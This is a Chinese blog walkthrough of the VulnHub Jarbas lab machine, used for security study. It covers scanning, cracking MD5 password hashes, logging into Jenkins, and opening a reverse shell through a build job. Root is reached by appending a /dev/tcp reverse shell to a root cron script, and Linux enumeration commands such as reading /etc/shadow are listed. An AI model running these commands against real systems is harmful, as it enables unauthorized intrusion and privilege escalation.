云计算百科
云计算领域专业知识百科平台

jarbas靶机渗透测试全攻略笔记——从入门到提权

靶机介绍

VulnHub的JARBAS一个典型CMS渗透测试样本。拥有完整的攻击链,大部分内容涉及对jenkins的利用操作,可以思考cms利用的原理和方式,有通用意义。信息收集和凭据破解一样有很多思路和思考值得借鉴,自动任务提权。

靶机搭建

靶机链接:https://download.vulnhub.com/jarbas/Jarbas.zip 访问链接即可自动下载,建议低峰时间段(早上)下载vuln的靶机,会快很多;

在这里插入图片描述

靶机配置:保证靶机与攻击机处于同一网段。一般靶机与攻击机kali设置为同一网络模 式即可,通常为net模式

  • 下载完成后解压导入虚拟机 VMware点击文件–>打开在这里插入图片描述
  • 找到解压目录,靶机对应的文件,选中打开

    在这里插入图片描述

  • 配置靶机网络连模式 在这里插入图片描述 在这里插入图片描述
  • 渗透思路

    主机存活探测

    sudo nmap -sn 10.10.10.0/24#ip a查看kali的ip,扫描对应的c段,开关靶机状态扫描对应多出的ip就是靶机ip,我这里攻击机的ip为10.10.10.3,靶机ip为10.10.10.4

    在这里插入图片描述

    端口快速扫描

    sudo nmap -sS –min-rate 10000 -p- 10.10.10.4

    在这里插入图片描述

    TCP扫描

    sudo nmap -sT -sV -O -p22,80,3306,8080 10.10.10.4

    在这里插入图片描述

    扫描出服务具体版本可以尝试查查是否存在历史cve漏洞,存在则可以进行利用,优先级高,对相关cve漏洞不太熟悉可以搜索相关复现博客

    sudo searchsploit OpenSSH 7.4
    sudo sudo searchsploit OpenSSH 7.4 -m 45233.py

    在这里插入图片描述

    UDP扫描

    sudo nmap -sU –min-rate 10000 -p- 10.10.10.4

    在这里插入图片描述

    POC扫描

    sudo nmap -script=vuln -p22,80,3306,8080,22848 10.10.10.4

    在这里插入图片描述 在这里插入图片描述

    poc扫描出了sqli和csrf漏洞,无法直接getshell,优先级往后靠,并且存在误报可能;8080端口扫描出了robost.txt目录,可以查看一下是否存在敏感信息泄露

    在这里插入图片描述 貌似没有什么有用的信息,提到了build可以记一下

    目录爆破

    nmap扫描完全后没有很明显的突破点,接下来就尝试对扫描到的端口进行目录爆破,进行更深一步的信息收集

    sudo dirb http://10.10.10.4

    基本扫描

    在这里插入图片描述

    访问扫描到的目录

    在这里插入图片描述

    对这个首页可以进行分析,使用的技术栈,源码是否有敏感信息泄露,是否存在漏洞等;分析完后再进行更具针对性的扫描

    针对扫描

    sudo dirb http://10.10.10.4 -X .html,.php#指定扫描文件后缀

    在这里插入图片描述

    访问一下access.html

    在这里插入图片描述

    貌似是账号和MD5加密的密码

    在这里插入图片描述 大概率为MD5加密,MD5的特征还是挺明显的,见的多了一眼可以看出来 尝试破解MD5加密,成功破解就能得到账号和密码,通过在线md5破解网站成功破解 tiago:italia99 trindade:marianna eder:vipsu 得到了账号密码,还得知道这个账号密码使用的地方;22端口的ssh,3306端口的mysql,或者是某个cms的后台登陆账号和密码都可以进行尝试

    尝试ssh

    ssh tiago@10.10.10.4

    在这里插入图片描述 让输入密码,证明用户确实存在,但是无法登陆上去,可能有其他限制

    尝试mysql登陆

    mysql -h 10.10.10.4 -u eder -p 3306

    在这里插入图片描述 服务器配置不允许从该IP地址连接

    尝试登陆网站后台

    在这里插入图片描述

    80端口貌似没有登陆功能,看看8080端口

    在这里插入图片描述 8080端口直接跳转登陆框,进行登陆尝试;eder:vipsu可以成功登陆后台,获得后台权限,下一步getshell 在这里插入图片描述 发现是一个jenkins的cms,搜索引擎搜索相关exploit

    新建项目

    在这里插入图片描述 在这里插入图片描述 在这里插入图片描述 写入反弹shell,并保存,注意该命令中的ip为攻击机kali的ip,而不是jarbas靶机的ip 在这里插入图片描述

    kali建立监听

    sudo nc -lvnp 1234

    在这里插入图片描述 成功getshell 在这里插入图片描述

    • 权限提升 Linux提权信息收集

    系统信息

    uname -a # 内核版本
    cat /etc/*-release # 发行版信息
    hostname # 主机名

    用户和权限

    id # 当前用户权限
    whoami # 当前用户
    sudo -l # sudo权限检查
    cat /etc/passwd # 所有用户
    cat /etc/shadow # 密码哈希(需root)

    网络信息

    ifconfig / ip addr # 网络配置
    netstat -tulpn # 监听端口
    ps aux # 运行进程

    文件系统

    find / -type f -perm -4000 2>/dev/null # SUID文件
    find / -type f -perm -2000 2>/dev/null # SGID文件
    find / -writable -type d 2>/dev/null # 可写目录
    mount # 挂载信息
    df -h # 磁盘使用

    计划任务

    crontab -l # 当前用户定时任务
    ls -la /etc/cron* # 系统定时任务
    cat /etc/crontab

    环境变量

    env # 环境变量
    echo $PATH

    查看定时任务时,发现每五分钟会以root权限执行CleaningScript.sh

    在这里插入图片描述 查看该文件的权限,发现有写权限

    ls -alh /etc/script/CleaningScript.sh

    kali开启监听本地4422端口

    nc -lvnp 4422

    追加写入shell

    echo "/bin/bash -i >& /dev/tcp/10.10.10.3/4422 0>&1" >> /etc/script/CleaningScript.sh

    在这里插入图片描述 等待定时任务执行,获得root权限 在这里插入图片描述

    参考资料:「红队笔记」https://www.bilibili.com/video/BV1jm4y1A7Tm?vd_source=af3435fef6607ef744910dacc85cab8f

    赞(0)
    未经允许不得转载:网硕互联帮助中心 » jarbas靶机渗透测试全攻略笔记——从入门到提权
    分享到: 更多 (0)

    评论 抢沙发

    评论前必须登录!